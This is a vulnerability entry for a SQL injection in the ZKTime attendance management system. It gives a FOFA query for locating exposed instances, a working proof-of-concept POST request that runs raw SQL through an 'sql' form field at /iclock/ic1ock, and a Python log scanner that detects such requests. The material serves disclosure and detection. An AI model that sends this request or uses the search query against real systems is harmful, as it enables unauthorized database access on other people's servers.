ZKTime SQL injection


Description

SQL injection in the ZKTime management system

fofa-query

title="ZKTime" || body="/media/images/ZKECO16.ico" || (body="ZKTeco Security LLC" && body="/media/jslib/baseISSobject.js")

POC

    POST /iclock/ic1ock HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    
    submit=%E6%89%A7%E8%A1%8C+SQL+%E8%AF%AD%E5%8F%A5&sql=select+md5(521)
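The request above has a recognisable shape on the wire: a POST under `/iclock/` whose form body carries an `sql` parameter holding a raw statement. The following is an added detection example (not part of the original write-up and not ZKTeco code) that scans log lines for that shape. The log format is an assumption: one JSON object per line with the request method, path and raw body, as a reverse proxy or WAF might emit; the sample lines are constructed, with the second one copying the PoC body.

```python
# Added example (not from the original write-up): flag POST requests to the
# ZKTime /iclock/ endpoint whose form body carries an `sql` parameter, which is
# the shape of the request shown in the PoC above. The log format is an
# assumption: one JSON object per line (method, path, raw body, client_ip).

import json
import re
from urllib.parse import parse_qs

# Leading keywords that indicate a raw SQL statement is being passed in.
SQL_STATEMENT = re.compile(
    r"^\s*(select|insert|update|delete|drop|union|create|alter)\b",
    re.IGNORECASE,
)


def is_suspicious(entry):
    """Return a reason string if the request matches the PoC pattern, else None."""
    if entry.get("method") != "POST":
        return None
    if not entry.get("path", "").lower().startswith("/iclock/"):
        return None
    params = parse_qs(entry.get("body", ""), keep_blank_values=True)
    if "sql" not in params:
        return None
    value = params["sql"][0]
    if SQL_STATEMENT.match(value):
        return f"raw SQL statement in 'sql' parameter: {value[:60]}"
    # An `sql` form field at all is unexpected for a normal client.
    return "unexpected 'sql' form parameter"


def scan_log(lines):
    """Return a list of (client_ip, path, reason) for each matching log line."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the whole scan
        reason = is_suspicious(entry)
        if reason:
            hits.append((entry.get("client_ip", "?"), entry.get("path"), reason))
    return hits


# Constructed sample log lines (not real traffic). The second entry reproduces
# the path and body of the PoC request; the others are benign filler.
SAMPLE_LOG = [
    '{"client_ip": "10.0.0.5", "method": "GET", "path": "/iclock/ping", "body": ""}',
    '{"client_ip": "10.0.0.9", "method": "POST", "path": "/iclock/ic1ock", '
    '"body": "submit=%E6%89%A7%E8%A1%8C+SQL+%E8%AF%AD%E5%8F%A5&sql=select+md5(521)"}',
    '{"client_ip": "10.0.0.7", "method": "POST", "path": "/login", "body": "user=a&pass=b"}',
    "this line is not json",
]

if __name__ == "__main__":
    for ip, path, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```

The check keys on the `/iclock/` prefix rather than the exact PoC path so that the same rule catches the request regardless of which handler under that prefix is hit; alerting on any `sql` form field, not only values that start with a statement keyword, keeps the rule useful when the payload is obfuscated.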